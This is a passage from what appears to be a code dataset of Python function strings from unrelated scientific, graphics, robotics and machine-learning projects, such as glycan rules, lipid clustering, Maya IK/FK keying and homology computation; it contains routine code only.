%d) & (Hex < (%d - (NeuAc + NeuGc)))\" % (base_hexnac + i - 2, base_hexnac + (2 * i) + 3))\n\n sialo.name = \"%s-antennary\" % spec\n asialo = CompositionRangeRule(\n _hexnac, base_hexnac + i - 1, base_hexnac + i + 1\n ) & CompositionRangeRule(\n _neuraminic, 0, 1 if i < 2 else 0\n ) & CompositionRangeRule(\n _hexose, base_hexnac + i - 1,\n base_hexnac + (2 * i) + 3)\n asialo.name = \"asialo-%s-antennary\" % spec\n neighborhoods.add(sialo)\n neighborhoods.add(asialo)\n return neighborhoods", "def createTableBOW(self,DBcursor):\n sql=\"create table if not exists BOW (bow_id INTEGER PRIMARY KEY, word TEXT, total_count INTEGER, netloc_count INTEGER, path_count INTEGER, params_count INTEGER, query_count INTEGER, fragment_count INTEGER);\"\n DBcursor.execute(sql)", "def collins_kimball(k_tst, k_diff):\n return k_tst * k_diff / (k_tst + k_diff)", "def GenKmers(consensus,MinLen=18,MaxLen=22):\n lengths = [i+MinLen for i in range(MaxLen+1-MinLen)]\n kmers = []\n for length in lengths:\n for i in range(len(consensus)+1 - length):\n kmer = consensus[i:i+length]\n kmers.append((i,kmer))\n return kmers", "def build_leftpart():\n # build kelly.\n build_kelly()\n # copy kelly to 3.\n copy(0, 3)\n\n # build june in slots 0,1,2\n build_june()\n # copy kelly to slot 1\n copy(3, 1)\n\n # smash together to get (june kelly) in 0\n smash()\n # copy (june kelly) to 1\n copy(0, 1)\n # build horace in 0\n build_horace(0)\n # smash together to get (horace (june kelly)) in 0\n smash()\n # wrap with an S for the whole left part.\n apply_card(\"S\", 0)", "def testBeliefs2sk(self):", "def identify_leaflets_cluster(self,pts,vec,topologize_time_limit=30,max_count_asymmetry=0.05):\n\t\timport scipy\n\t\timport sklearn\n\t\timport sklearn.neighbors\n\t\timport sklearn.cluster\n\t\tnlipids = len(pts)\n\t\t#---time limit on the topologize function which joins broken bilayers e.g. a saddle that crosses PBCs\n\t\ttry:\n\t\t\twith time_limit(topologize_time_limit): \n\t\t\t\twrapper = topologize(pts,vec,\n\t\t\t\t\t**({'tol':self.topologize_tolerance} if self.topologize_tolerance else {}))\n\t\texcept TimeoutException: \n\t\t\tstatus('topologize failed to join the bilayer. '\n\t\t\t\t'if it is broken over PBCs e.g. a saddle, this is a serious error which may go undetected. 
'\n\t\t\t\t'make sure you always inspect the topology later.',tag='error')\n\t\t\twrapper = np.zeros((len(pts),3))\n\t\tfindframe = pts + wrapper*np.array(vec)\n\t\t#---ensure that all points are in the box\n\t\tfindframe += vec*(findframe<0) - vec*(findframe>vec)\n\t\t#---previous calculation of connectivity was done manually\n\t\tif False:\n\t\t\t#---conservative cutoff gets lots of nearby points\n\t\t\tcutoff = 10.0\n\t\t\tcutoff_short = 2.0\n\t\t\t#---make a K-D tree from the points\n\t\t\ttree = scipy.spatial.ckdtree.cKDTree(findframe,boxsize=np.concatenate((vec,vec))+0.*eps)\n\t\t\t#---find the nearest reference points for each instantaneous point\n\t\t\tclose,nns = tree.query(findframe,distance_upper_bound=cutoff,k=20)\n\t\t\t#---construct the neighbor list\n\t\t\tsubjects = np.where(np.all((close<cutoff,close>0),axis=0))\n\t\t\t#---get the pairs of neighbors\n\t\t\tsubjects,neighbors = subjects[0],nns[subjects]\n\t\t\tpds = np.ones((nlipids,nlipids))*0.0\n\t\t\tpds[tuple((np.arange(nlipids),np.arange(nlipids)))] = 0.0\n\t\t\tnears = np.where(np.all((close>0,close<=cutoff_short),axis=0))\n\t\t\tpds[tuple((nears[0],nns[nears]))] = 1.0#close[nears]\n\t\t\tpds[tuple((nns[nears],nears[0]))] = 1.0#close[nears]\n\t\tconnectivity = sklearn.neighbors.kneighbors_graph(findframe,\n\t\t\tn_neighbors=self.cluster_neighbors,include_self=False)\n\t\tward = sklearn.cluster.AgglomerativeClustering(n_clusters=2,\n\t\t\tconnectivity=connectivity,linkage='complete').fit(findframe)\n\t\timono = ward.labels_\n\t\tif np.mean(imono)==0.5: \n\t\t\tstatus('[STATUS] perfect split is %0.5f'%np.mean(imono))\n\t\telif (np.all(np.array(imono)==0) or np.all(np.array(imono)==1) or \n\t\t\tnp.abs(np.mean(imono)-0.5)>=max_count_asymmetry):\n\t\t\tstatus('[STATUS] split is %0.5f'%np.mean(imono))\n\t\t\tstatus('[STATUS] one side has %d'%np.sum(imono))\n\t\t\tstatus('[WARNING] leaflets were not distinguished')\n\t\t\traise Exception('[ERROR] failed to identify leaflets. '\n\t\t\t\t'DEVELOPMENT NOTE!? 
use legacy or a different cutoff?')\n\t\telse: status('[STATUS] some lipids might be flipped %d %.5f'%(np.sum(imono),np.mean(imono)))\n\t\treturn np.array(imono)", "def create_lmdb_for_div2k():\n # HR images\n folder_path = 'trainsets/DIV2K/DIV2K_train_HR_sub'\n lmdb_path = 'trainsets/DIV2K/DIV2K_train_HR_sub.lmdb'\n img_path_list, keys = prepare_keys_div2k(folder_path)\n make_lmdb_from_imgs(folder_path, lmdb_path, img_path_list, keys)\n\n # LRx2 images\n folder_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic/X2_sub'\n lmdb_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic_X2_sub.lmdb'\n img_path_list, keys = prepare_keys_div2k(folder_path)\n make_lmdb_from_imgs(folder_path, lmdb_path, img_path_list, keys)\n\n # LRx3 images\n folder_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic/X3_sub'\n lmdb_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic_X3_sub.lmdb'\n img_path_list, keys = prepare_keys_div2k(folder_path)\n make_lmdb_from_imgs(folder_path, lmdb_path, img_path_list, keys)\n\n # LRx4 images\n folder_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic/X4_sub'\n lmdb_path = 'trainsets/DIV2K/DIV2K_train_LR_bicubic_X4_sub.lmdb'\n img_path_list, keys = prepare_keys_div2k(folder_path)\n make_lmdb_from_imgs(folder_path, lmdb_path, img_path_list, keys)", "def cut_bonds_strain(xy, NL, KL, BM0, bstrain):\n NP, NN = np.shape(NL)\n BL = NL2BL(NL, KL)\n bL0 = BM2bL(NL, BM0, BL)\n BLtrim, bL0trim = cut_bonds_strain_BL(BL, xy, bL0, bstrain)\n KL = BL2KL(BLtrim, NL)\n # i2cut = (np.sqrt((xy[BL[:,0],0]-xy[BL[:,1],0])**2+(xy[BL[:,0],1]-xy[BL[:,1],1])**2) - bL0) < bstrain*bL0\n return KL, BLtrim, bL0trim", "def test_1_2_2D_rec_splits(self):\n check = [(3.0, -2.0), (7.0, -1.0), (7.0, -2.0), (3.0, -1.0),\n (5.0, -1.5), (3.0, -1.5), (5.0, -2.0), (4.0, -1.75),\n (7.0, -1.5), (5.0, -1.0), (6.0, -1.25), (6.0, -1.75),\n (4.0, -1.25), (5.0, -1.75), (4.0, -1.5), (4.5, -1.625),\n (3.0, -1.75), (4.0, -2.0), (3.5, -1.875), (3.5, -1.625),\n (4.5, -1.875), (5.0, -1.25), (6.0, -1.5), (5.5, -1.375),\n (7.0, -1.25), (6.0, -1.0), (6.5, -1.125), (6.5, -1.375),\n (5.5, -1.125), (5.5, -1.625), (7.0, -1.75), (6.0, -2.0),\n (6.5, -1.875), (6.5, -1.625), (5.5, -1.875), (4.5, -1.375),\n (3.0, -1.25), (4.0, -1.0), (3.5, -1.125), (3.5, -1.375),\n (4.5, -1.125)]\n nn_checks = {(3.0, -2.0): [(3.0, -1.75), (3.5, -1.875), (4.0, -2.0)],\n (5.0, -1.75): [(5.0, -2.0), (5.0, -1.5), (5.5, -1.625),\n (5.5, -1.875), (4.5, -1.625), (6.0, -1.75),\n (4.5, -1.875), (4.0, -1.75)],\n (6.0, -2.0): [(5.0, -2.0), (5.5, -1.875), (6.0, -1.75),\n (6.5, -1.875), (7, -2)],\n (4.5, -1.125): [(5.0, -1.0), (4.0, -1.25), (5.0, -1.25),\n (4.0, -1.0)]}\n\n init_triangulation(2, 2, check, nn_checks, bounds=[(3, 7), (-2, -1)])", "def make_branch_matrix(self):\n self.bm = []\n for pod in self.pods:\n for lb in pod.limbs:\n row = []\n for br in lb.branches:\n row.append(br)\n self.bm.append(row)\n #print \"appended %d-element row %d\" % (len(row),len(self.bm))", "def lmbd(self, lamb):\n\t n = self.nodes\n\n\t \t# The top_k_nodes is a list of all nodes in descending\n\t # order of influence\n\t top_k_nodes = self.top_k(self.nodes)\n\t for i in range(n):\n\t\t\tself.deactivate_all()\n\t\t\tinitially_active = top_k_nodes[:i]\n\n\t\t\ttotal_contrib = i + 1\n\t\t\tfor node in initially_active:\n\t\t\t\ttotal_contrib += self.v(node)\n\n\t\t\tcoverage = total_contrib*1.00/n\n\t\t\tif coverage >= lamb:\n\t\t\t\treturn top_k_nodes[:i]", "def _G_to_km_on_basis_single_level(self, w, m):\n kB = self._sym.kBoundedSubspace(self.k,t=1)\n g = kB.K_kschur()\n mon = self.km()\n if m < 
w.length():\n return 0\n ans = self.zero()\n for la in Partitions(m, max_part = self.k):\n ans += g.homogeneous_basis_noncommutative_variables_zero_Hecke((la)).coefficient(w)*mon(la)\n return ans", "def bisection(leaf, args):\n #retrieve the lower/upper bound of given Most Promising Region\n lb = leaf.lb\n ub = leaf.ub\n #find the dimension number of decision variabless\n dimX = len(lb)\n #determine the dimension that should be partitioned\n dimID = (leaf.level + 1) % dimX \n #determine the partition threshold\n thr = (lb[dimID]+ub[dimID])/2.0\n #create new lower/upper middle bound [lb,umb], [lmd,ub]\n lmb,umb = [np.array([]) for i in range(2)]\n for i in range(dimX):\n lmb = np.append(lmb,[lb[i],thr][i==dimID])\n umb = np.append(umb,[ub[i],thr][i==dimID])\n subRegions = [[lb,umb],[lmb,ub]]\n return {'parent':leaf,'thr':thr,'subRegions':subRegions}", "def __init__(self, wks, bks, wqs, bqs):\r\n self.wks = wks\r\n self.bks = bks\r\n self.wqs = wqs\r\n self.bqs = bqs", "def generate_jaccard0_isoseq_bed(self):\n all = set(self.isoseqid2exonlen.keys())\n notwant = set(self.isoseqid2besttransidB.keys())\n want = all - notwant\n want_lines = []\n with open(\"../data/pacbio/\" + self.name + \".B.j0.bed\", 'w') as f:\n for line in self.linesPacBioBed:\n (chrom, chromStart, chromEnd, name, score, strand, thickStart, thickEnd, itemRgb, blockCount, blockSizes, blockStarts) = line.rstrip().split(\"\\t\")\n if name in want:\n f.write(line)", "def MakeDoubleBag(self):\n for i in self.TetrominoTypeList:\n self.bag.update({i : 2})", "def ik_to_fk(node):\n ik_main_off = get_parent(node.ik_main_conn)\n fk_01_off = get_parent(node.fk_01_conn)\n fk_02_off = get_parent(node.fk_02_conn)\n fk_03_off = get_parent(node.fk_03_conn)\n\n ik_main_world_trans = get_world_trans(node.ik_main_conn)\n fk_01_world_trans = get_world_trans(node.fk_01_conn)\n ik_main_off_world_trans = get_world_trans(ik_main_off)\n fk_01_off_world_trans = get_world_trans(fk_01_off)\n fk_02_off_world_trans = get_world_trans(fk_02_off)\n fk_03_off_world_trans = get_world_trans(fk_03_off)\n\n # calculate base information\n def_len = (ik_main_off_world_trans - fk_01_off_world_trans).length()\n\n # Calculate ik direction\n ik_dir_01 = ik_main_off_world_trans - fk_01_off_world_trans\n ik_dir_02 = ik_main_world_trans - fk_01_world_trans\n\n ik_dir_rot = ik_dir_01.rotateTo(ik_dir_02).asEulerRotation()\n\n # Apply ik direction -> important to calculate correct pole rotations\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(ik_dir_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ik pole rotations\n ik_pole_world_mat = get_world_matrix(node.ik_pole_conn, 0)\n fk_03_world_inv_mat = get_world_inv_matrix(node.fk_01_conn, 0)\n\n ik_pole_rot_mat = ik_pole_world_mat * fk_03_world_inv_mat\n\n ik_pole_vec = oMa.MTransformationMatrix(ik_pole_rot_mat).translation(oMa.MSpace.kWorld)\n ik_pole_vec.y = 0\n\n ik_pole_rot = oMa.MVector.kZaxisVector.rotateTo(ik_pole_vec).asEulerRotation()\n\n # Calculate ik rotations\n tri_a_len = (fk_02_off_world_trans - fk_01_off_world_trans).length()\n tri_b_len = (fk_03_off_world_trans - fk_02_off_world_trans).length()\n tri_c_len = (ik_main_world_trans - fk_01_world_trans).length()\n\n if tri_c_len >= def_len:\n fk_02_angle = 0\n fk_01_angle = 0\n else:\n fk_02_angle = math.pi - solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"C\")\n fk_01_angle = -solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"B\")\n\n # Add rotations together\n fk_01_temp = 
oMa.MEulerRotation(fk_01_angle, ik_pole_rot.y, 0)\n\n ik_dir_mat = compose_mat(ik_dir_rot)\n fk_01_mat = compose_mat(fk_01_temp)\n rot_mat = fk_01_mat * ik_dir_mat\n\n # Apply everything\n fk_01_rot = get_rot_from_mat(rot_mat)\n fk_02_rot = (fk_02_angle, 0, 0)\n\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_01_rot[i], oMa.MAngle.kRadians))\n\n fk_02_rot_plugs = get_rot_plugs(node.fk_02_conn)\n for i, plug in enumerate(fk_02_rot_plugs):\n if not plug.isLocked:\n plug.setMAngle(oMa.MAngle(fk_02_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ankle rotation\n fk_03_rot = rot_world_space_to_local_space(node.ik_main_conn, get_parent(node.fk_03_conn))\n\n fk_03_rot_plugs = get_rot_plugs(node.fk_03_conn)\n for i, plug in enumerate(fk_03_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_03_rot[i], oMa.MAngle.kRadians))", "def simple_maize(plant_area=10000, plant_height=200, pseudostem_height=20,\n phytomer=16, rmax=0.67, pseudostem_dist=1.4, stem_dist=1.,\n diam_base=2.5, diam_top=1, leaves=None, phyllotactic_angle=180,\n phyllotactic_deviation=15, plant_orientation=0, wl=0.1, skew=0.15, seed=None):\n\n numpy.random.seed(seed)\n ranks = range(1, phytomer + 1)\n ntop = max(ranks) - numpy.array(ranks) + 1\n if leaves is None:\n path = maize_leaves_path()\n db = load_leaf_db(path)\n leaves = {rank: db.get(str(rank), db['10'])[0] for rank in ranks}\n\n phytomer = int(phytomer)\n\n # Lejeune an Bernier formula + col =\n nb_young_phy = int(round((phytomer - 1.95) / 1.84 / 1.3))\n\n # compute the leaf surface\n leaf_area = numpy.array(\n bell_shaped_dist(plant_area=plant_area, nb_phy=phytomer, rmax=rmax,\n skew=skew))\n\n # distances between leaves\n pseudostem = geometric_dist(pseudostem_height, nb_young_phy,\n pseudostem_dist)\n stem = geometric_dist(plant_height - pseudostem_height,\n phytomer - nb_young_phy, stem_dist)\n internode = pseudostem + stem\n # stem diameters\n diameter = ([diam_base] * nb_young_phy +\n numpy.linspace(diam_base, diam_top,\n phytomer - nb_young_phy).tolist())\n\n ff = [get_form_factor(leaves[rank]) for rank in ranks]\n blades = blade_dimension(area=leaf_area, form_factor=ff, ntop=ntop, wl=wl)\n stem = stem_dimension(internode=internode, d_internode=diameter, ntop=ntop)\n df = blades.merge(stem)\n\n df['leaf_azimuth'] = leaf_azimuth(size=len(ranks), phyllotactic_angle=phyllotactic_angle, phyllotactic_deviation=phyllotactic_deviation,\n plant_orientation=plant_orientation)\n df['leaf_rank'] = ranks\n df['leaf_shape'] = [leaves[n] for n in df.leaf_rank]\n\n return df", "def __init__(self, kBoundedRing):\n KBoundedQuotientBasis.__init__(self, kBoundedRing, 'F')\n\n from sage.combinat.root_system.weyl_group import WeylGroup\n self._weyl = WeylGroup(['A', kBoundedRing.k, 1])\n\n km = kBoundedRing.km()\n self.module_morphism(self._F_to_m_on_basis,codomain=km).register_as_coercion() # morphism from affine Schur functions to k-bounded-m\n km.module_morphism(self._m_to_F_on_basis,codomain=self).register_as_coercion() # morphism from k-bounded-m basis to affine-Schur basis", "def key_fk(*args):\n\n robots = get_robot_roots()\n if not robots:\n pm.warning('No robots selected')\n return\n\n for robot in robots:\n # If the robot's IK attribute is on, switch the robot to\n # FK mode before proceeding\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n if pm.getAttr(target_ctrl_path + '.ik'):\n switch_to_fk(robot)\n\n # We first check if the target/tool controller 
transformation and\n # orientation is already aligned with the FK chain. If so, it\n # indicates that we're performing an IK to FK switch, and we\n # keyframe its position and orientation directly, without\n # snapping the IK control to the FK hierarchy. This is to avoid\n # unneccessarily changing the controllers Euler Angle rotation\n # representation that can cause unpredictable behavior between frames\n\n if pm.objExists(tool_ctrl_path):\n ctrl_ik = tool_ctrl_path\n ctrl_fk = format_path(__TOOL_CTRL_FK_PATH, robot)\n\n # If robot doesn't have a tool controller, use target_CTRL.\n else:\n ctrl_ik = target_ctrl_path\n ctrl_fk = format_path(__TCP_HDL_PATH, robot)\n\n if not _ik_and_fk_aligned(ctrl_ik, ctrl_fk):\n _snap_ik_target_to_fk(robot)\n\n # Key all FK elements\n try:\n pm.setKeyframe(format_path(__A1_FK_CTRL_PATH, robot),\n attribute='rotateY')\n pm.setKeyframe(format_path(__A2_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A3_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A4_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n pm.setKeyframe(format_path(__A5_FK_CTRL_PATH, robot),\n attribute='rotateX')\n pm.setKeyframe(format_path(__A6_FK_CTRL_PATH, robot),\n attribute='rotateZ')\n\n # Key visibility of FK controllers\n for i in range(6):\n pm.setKeyframe(format_path(__FK_CTRLS_PATH, robot),\n attribute='visibility')\n except:\n pm.warning('Error setting FK keys in FK mode')\n\n # Key all IK elements\n try:\n pm.setKeyframe(target_ctrl_path, attribute='ik')\n pm.setKeyframe(target_ctrl_path, attribute='v', value=0)\n\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='v')\n\n # Key tool controllers\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='translate')\n pm.setKeyframe(tool_ctrl_path, attribute='rotate')\n else:\n pm.setKeyframe(target_ctrl_path, attribute='translate')\n pm.setKeyframe(target_ctrl_path, attribute='rotate')\n\n except:\n pm.warning('Error setting IK keys in FK mode')", "def make_chains(corpus):\n c_dict = {}\n\n for x in range(len(corpus)):\n if x < (len(corpus)-2): # not in edge\n bigram_tuple = tuple([corpus[x],corpus[x+1]])\n if bigram_tuple in c_dict:\n c_dict[bigram_tuple].append(corpus[x+2])\n else:\n c_dict[bigram_tuple] = [corpus[x+2]]\n else:\n bigram_tuple = tuple([corpus[-2],corpus[-1]]) # ran twice. Why?\n c_dict.setdefault(bigram_tuple) # could set a default word? 
Empty list?\n\n return c_dict", "def __init__(self, kBoundedRing):\n KBoundedQuotientBasis.__init__(self, kBoundedRing, 'dks')\n\n kHLP = kBoundedRing.kHallLittlewoodP()\n self.module_morphism(self._dks_to_khlp_on_basis,codomain=kHLP).register_as_coercion() # morphism from dual-k-Schurs to k-bounded-HLP\n kHLP.module_morphism(self._khlp_to_dks_on_basis,codomain=self).register_as_coercion() # morphism from k-bounded-HLP to dual-k-Schurs", "def add_branch(mb, k, l):\n return _RNAstructure_wrap.add_branch(mb, k, l)", "def test_weyl_specialize_fsim_abmb(self, aaa=0.456, bbb=0.132):\n a, b, c = aaa, bbb, -bbb\n for da, db, dc in DELTAS:\n for k1l, k1r, k2l, k2r in K1K2SB:\n k1 = np.kron(k1l.data, k1r.data)\n k2 = np.kron(k2l.data, k2r.data)\n self.check_two_qubit_weyl_specialization(\n k1 @ Ud(a + da, b + db, c + dc) @ k2,\n 0.999,\n TwoQubitWeylfSimabmbEquiv,\n {\"rx\": 7, \"ry\": 4, \"rxx\": 1, \"ryy\": 1, \"rzz\": 1},\n )", "def test_split_outer_multipolygon_way_2():\n data = cache_query(ways=[15001, 15002], deps=True)\n assert data['ways']['15001']['relations'].keys() == ['15001']\n assert data['ways']['15002']['relations'].keys() == ['15001']\n\n assert query_row(db_conf, 'osm_landusages', 15001) == None\n park_15001 = query_row(db_conf, 'osm_landusages', -15001)\n assert park_15001['type'] == 'park'\n assert_almost_equal(park_15001['geometry'].area, 9816216452, -1)\n assert query_row(db_conf, 'osm_roads', 15002)['type'] == 'residential'", "def __init__(self):\n self.kids = [{}]\n self.root = 0\n self.vocabular = set([])", "def gen_Strikes(L):\r\n p = next_Prim(L)\r\n t = 1\r\n yield t*p\r\n for k in L:\r\n t += k\r\n yield t*p", "def __bcc_left_diagonals(self) -> cq.cq.Workplane:\n # In a cuboid ABCDA1B1C1D1 this is the angle C1AD\n #angle_C1AD = 90 - degrees(acos(2**-.5))\n angle_C1AD = 90 - degrees(acos(0.5))\n angle_CAD = 90 - degrees(acos(sqrt(2/3)))\n pseudo_unit_cell_size = sqrt(2/3)*self.unit_cell_size\n corner_points = np.array(\n [(0, 0),\n (self.bcc_unit_cell_size, 0),\n (self.bcc_unit_cell_size, self.unit_cell_size),\n (0, self.unit_cell_size)]\n )\n result = (\n cq.Workplane(\"XY\")\n .pushPoints(corner_points)\n .eachpointAdaptive(\n create_bcc_diagonal_strut,\n callback_extra_args = [\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": angle_C1AD}\n ],\n useLocalCoords = True\n )\n )\n return result", "def split_at_conflict(scaff1, scaff2, k):\n linker = \"link_conflict5\"\n p1 = scaff1.index(k)\n p2 = scaff2.index(k)\n \n l_split1=0\n r_split1=0\n l_split2=0\n r_split2=0\n out1=[]\n out2=[]\n out3=[]\n out_scaffs = []\n\n for q in range(len(scaff2)-p2-1):\n if scaff1[p1+q] != scaff2[p2+q]:\n r_split1 = p1+q-1\n r_split2 = p2+q-1\n break\n for q in range(p2):\n if scaff1[p1-q] != scaff2[p2-q]:\n l_split1 = p1-q+2\n l_split2 = p2-q+2\n break\n\n if l_split1 and r_split1: \n out1 = scaff1[:l_split1]\n out1.append(linker)\n out2 = scaff1[l_split1:r_split1]\n out2.insert(0,linker)\n out2.append(linker)\n out3 = scaff1[r_split1:]\n out3.insert(0,linker)\n out_scaffs.extend([out1,out2,out3])\n \n elif 
l_split1:\n out1 = scaff1[:l_split1]\n out1.append(linker)\n out3 = scaff1[l_split1:]\n out3.insert(0,linker)\n out_scaffs.extend([out1,out3]) \n \n elif r_split1:\n out1 = scaff1[:r_split1]\n out1.append(linker)\n out3 = scaff1[r_split1:]\n out3.insert(0,linker)\n out_scaffs.extend([out1,out3])\n \n else:\n paf(\"NB! Expected conflict not found\")\n\n if l_split2 and r_split2:\n out1 = scaff2[:l_split2]\n out1.append(linker)\n out2 = scaff2[l_split2:r_split2]\n out2.insert(0,linker)\n out2.append(linker)\n out3 = scaff2[r_split2:]\n out3.insert(0,linker)\n out_scaffs.extend([out1,out2,out3])\n \n elif l_split2:\n out2 = scaff2[:l_split2]\n out2.append(linker)\n out3 = scaff2[l_split2:]\n out3.insert(0,linker)\n out_scaffs.extend([out2,out3])\n \n elif r_split2:\n out2 = scaff2[:r_split2]\n out2.append(linker)\n out3 = scaff2[r_split2:]\n out3.insert(0,linker)\n out_scaffs.extend([out2,out3])\n \n else:\n paf(\"NB! Expected conflict not found\")\n\n return out_scaffs", "def cutNow(self,leftMonomers,definitive=False):\n # A1 ~ Unif[0,N-1-(Nc-1)(g-1)[\n for A1 in leftMonomers:\n A2 = A1 + 1\n # Mise a jour de la matrice laplacienne\n self.LaplacianMatrix[A1,A2] = 0\n self.LaplacianMatrix[A2,A1] = 0\n self.LaplacianMatrix[A1,A1] -= 1 \n self.LaplacianMatrix[A2,A2] -= 1 \n # Mise a jour de la liste d'adjacence\n self.cutEdge(A1,A2)\n # Add new free ends to freeMonomers list\n self.freeMonomers.extend([A1,A2])\n \n if definitive:\n self.generatePossibleEncounters()\n# \n for i in range(len(self.freeMonomers)):\n self.freeMonomersNames[self.freeMonomers[i]] = chr(97 + i//2) + str(1 + i%2)", "def _khlp_to_dks_on_basis(self, la):\n Sym = self._kBoundedRing.ambient()\n kB = Sym.kBoundedSubspace(self.k, t=self.t)\n Qp = Sym.hall_littlewood(t=self.t).Qp()\n ks = kB.kschur()\n return sum( Qp(ks(x)).coefficient(la) * self(x) for x in PartitionsGreatestLE(sum(la), self.k))", "def __init__(self, k):\n self.k = k\n self.N = 2**self.k", "def khorne_slide(obs, berzerker_x, berzerker_y):\n def environment_fits(obs, berzerker_x, berzerker_y):\n \"\"\" environment fits constraints \"\"\"\n # if prey has the ball\n if obs[\"ball_owned_team\"] == 1:\n prey_x = obs[\"right_team\"][obs[\"ball_owned_player\"]][0]\n prey_y = obs[\"right_team\"][obs[\"ball_owned_player\"]][1]\n # by x position, amount of berzerker's team players between prey and goal of berzerker's team\n players_amount = 0\n for i in range(1, len(obs[\"left_team\"])):\n if obs[\"left_team\"][i][0] < prey_x:\n players_amount += 1\n prey_x_direction = obs[\"right_team_direction\"][obs[\"ball_owned_player\"]][0]\n future_prey_x = prey_x + obs[\"right_team_direction\"][obs[\"ball_owned_player\"]][0]\n future_prey_y = prey_y + obs[\"right_team_direction\"][obs[\"ball_owned_player\"]][1]\n future_berzerker_x = berzerker_x + obs[\"left_team_direction\"][obs[\"active\"]][0]\n future_berzerker_y = berzerker_y + obs[\"left_team_direction\"][obs[\"active\"]][1]\n distance_to_prey = get_distance(berzerker_x, berzerker_y, prey_x, prey_y)\n future_distance_to_prey = get_distance(future_berzerker_x, future_berzerker_y, future_prey_x, future_prey_y)\n # if berzerker is not close to his own penalty zone\n # and prey is beyond x position of too many players of berzerker's team\n # and berzerker is close enough to prey\n # and berzerker is running in direction of prey\n if ((berzerker_x > -0.65 or abs(berzerker_y) > 0.3) and\n players_amount <= 7 and\n future_distance_to_prey < 0.015 and\n distance_to_prey > future_distance_to_prey):\n return True\n return False\n \n 
def get_action(obs, berzerker_x, berzerker_y):\n \"\"\" get action of this memory pattern \"\"\"\n return Action.Slide\n \n return {\"environment_fits\": environment_fits, \"get_action\": get_action}", "def breed(self):\r\n self.offspring = []\r\n # 0 will increment each time a node breeds, until it reaches breeding_times\r\n available = [[x, 0] for x in self.population] # who is left available\r\n while True:\r\n # take the first node in available as the base, breed them with random partners\r\n # in available, then remove first node from available\r\n\r\n # range(...) ensures we breed the right number of times\r\n for breed_count in range(available[0][1], self.breeding_times):\r\n try: # try to choose a partner from those in available\r\n choice = random.choice(available[1:])\r\n except IndexError: #Sometimes the last guy gets left out\r\n #print('ruh roh')\r\n choice = [random.choice(self.population), -1]\r\n\r\n # breed with the chosen partner\r\n self.offspring.append(available[0][0].reproduce(choice[0]))\r\n # increase the partner's breed count by one\r\n choice[1] += 1\r\n # if the partner's bred the requisite number of times, remove them from available\r\n if choice[1] == self.breeding_times:\r\n available.remove(choice)\r\n # remove our start node from available\r\n del(available[0])\r\n\r\n # if everyone's bred, break the loop\r\n if len(available) == 0:\r\n break\r\n\r\n # archive the parent generation, make the new population the offspring.\r\n self.past_generations.append(self.population)\r\n self.population = self.offspring", "def homology_basis(bd, k, C=None, shortest=False, log=None):\n L1, R1, S1, L1inv = smith_normal_form_mod2(bd[k])\n L2, R2, S2, L2inv = smith_normal_form_mod2(bd[k + 1])\n\n rank1 = np.sum(S1)\n rank2 = np.sum(S2)\n nullity1 = S1.shape[1] - rank1\n betti1 = S1.shape[1] - rank1 - rank2\n cokernel2_dim = S1.shape[1] - rank2\n\n print(f'Summary: \\nrank{k} = {rank1}\\nrank{k+1} = {rank2}\\nnullity{k} = {nullity1}')\n\n ker1 = R1[:, rank1:]\n im2 = L2inv[:, :rank2]\n cokernel2 = L2inv[:, rank2:]\n cokproj2 = L2[rank2:, :]\n\n proj = matmulreduce([cokernel2, cokproj2, ker1]).transpose()\n ######\n print(proj)\n _, proj, _ = reduced_row_echelon_form_mod2(proj)\n proj = np.array(proj)\n proj = np.array([row for row in proj if np.any(row)])\n # print(f'hom basis reps: {proj*1}\\n')\n basis = []\n if shortest:\n shortest_basis = list()\n for idx, bs in enumerate(proj):\n shortest_basis.append(coset(im2, bs=bs, shortest=True))\n if C:\n basis = [interpret(C, sb) for sb in shortest_basis]\n\n proj = shortest_basis\n else:\n if C:\n basis = interpret(C, proj)\n else:\n basis = proj\n if log:\n try:\n logdict = pickle.load(open(log, 'rb'))\n except:\n logdict = dict()\n logdict.update({'k': k,\n f'betti{k}': betti1,\n 'ker': ker1,\n 'im': im2,\n 'proj': proj,\n 'basis': basis})\n pickle.dump(logdict, open(log, 'wb'))\n\n return basis", "def beam_search(X, u, w, b, relLabels):\n\n candidate_paths = [[] for _ in range(10)] # contains the candidate label sets\n candidate_vals =[[] for _ in range(10)] # contains the label values (-1/1) for each candidate set\n candidate_scores = [0. 
